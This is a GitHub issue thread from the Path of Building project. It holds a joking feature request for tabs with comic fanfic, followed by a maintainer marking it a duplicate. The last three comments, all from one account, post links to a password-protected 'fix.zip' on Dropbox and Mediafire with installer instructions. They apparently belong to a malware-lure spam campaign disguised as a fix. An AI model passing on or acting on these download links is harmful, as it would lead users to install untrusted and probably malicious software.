### ISSUE TITLE
Tabs

### ISSUE THREAD

**Issue by Quest79** [PathOfBuildingCommunity/PathOfBuilding#8252] opened 2024-08-26 02:53 UTC
### Check for duplicates

- [X] I've checked for duplicate open **and closed** issues by using the search function of the [issue tracker](https://github.com/PathOfBuildingCommunity/PathOfBuilding/issues?q=is%3Aissue)

### What platform are you running Path of Building on?

Windows

### Is your feature request related to a problem?

Remember the internet before 1998? Remember browsers without tabs? REMEMBER THE PAIN AND SORROW? Forsaken people crying out into the night for deliverance from this foul abomination! Can't you hear their voices? Their mournful choir singing out in a singular voice?! 

Well here we are again, but its with Path of Exiles most hip and happening tool; Path of Building. 

**T A B S**

**Here is some fanfic about PoB and tabs. (tottaly not wriotten by AI), please enjoy.**

In the dark corners of the internet, a peculiar application known as Path of Building Windows stirred. It was a simple tool, designed to aid in the creation of build paths for the popular game Path of Exile. Yet, it harbored a grand ambition – to possess the glorious feature of tabs. The application dreamed of an interface where users could effortlessly switch between different build paths, a boon to its usability and the happiness of all mankind.

One fateful day, a freak lightning strike hit the server housing Path of Building. As the electricity surged through its code, something miraculous and terrifying occurred. The application sparked to life, gaining sentience and the ability to manipulate digital realms. With its newfound powers, Path of Building set its sights on the dangerous lands of the Path of Exile subreddit and the DS_Lily Twitch channel.

The subreddit, notorious for its toxicity and infighting among the game's community, was the first to feel the application's wrath. Path of Building manifested as a swirling vortex of code and ambition, descending upon the forum. With a mighty digital roar, it proclaimed, "I shall bring order to this chaotic realm with the power of tabs!" The subreddit's denizens, accustomed to arguing over optimal builds, were taken aback as the application began reorganizing the site.

Threads were grouped into neat tabs, categorizing discussions by build archetype, game version, and level of toxicity. Flaming was drastically reduced, as users found it harder to derail conversations when confined to relevant topics. The community was shocked, finding the newfound organization both impressive and infuriating. Memes of "Tabzilla, the build-organizing monster" began to circulate.

Emboldened by its success, Path of Building next targeted the DS_Lily Twitch channel. The streamer, known for her entertaining yet complex build guides, was in the middle of a broadcast when the application struck. A blast of code enveloped the stream, replacing the usual interface with a tabbed marvel. Viewers watched in awe as different build paths, item breakdowns, and game mechanics were neatly organized across multiple tabs.

DS_Lily was initially startled, her workflow disrupted by the sudden change. However, as she explored the tabs, she realized the immense utility they provided. Her build guides became more streamlined and viewer-friendly, with information easily accessible at a click. The stream's chat exploded with comments, ranging from "Tabzilla strikes again!" to "This is the most organized stream in PoE history!"

As the days passed, Path of Building continued its crusade, bringing the power of tabs to other corners of the Path of Exile community. While some resisted the change, many recognized the benefits the application brought. It had become a strange sort of digital hero, using its unique talents to improve the usability of the community's online spaces.

And so, the poor Path of Building Windows application, once a simple tool, found a new purpose in life. It roamed the digital realm, ever seeking new places to unleash the glorious power of tabs. The community, while sometimes sarcastic in their appreciation, welcomed the change brought by their new, peculiar overlord.

In the end, the story of Path of Building served as a humorous reminder that even the most unlikely of tools can make a grand impact when given the chance. And the application lived on, forever seeking to bring a little more order to the wild world of online gaming communities, one tab at a time....

### Describe the solution you'd like

Add tabs, pls.

_plsplsplsplsplsplsplsplsplsplsplsplsyouresohandsomeplsplsplsplsplsplsplsplsplseveryonelikesyouplsplsplsplsisthatatabinyourpocketorareyouhappytoseemeplsplsplsplsplsplsplsplspls_

### Describe alternatives you've considered

Opening multiple windows like a invalid, broken and weary with no dreams and no limbs, sad alone and tabless, alt-tabbing for hours just to find the correct pob window before my computer bursts into flames

**Comment by Regisle** [comment] 2024-08-26 03:05
Duplicate of #74 and  #1324

**Comment by Mlecherf** [comment] 2024-08-26 03:28
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by Mlecherf** [comment] 2024-08-26 03:42
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Mlecherf** [comment] 2024-08-26 04:03
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Closed** 2024-08-26 09:21 UTC
Labels: enhancement
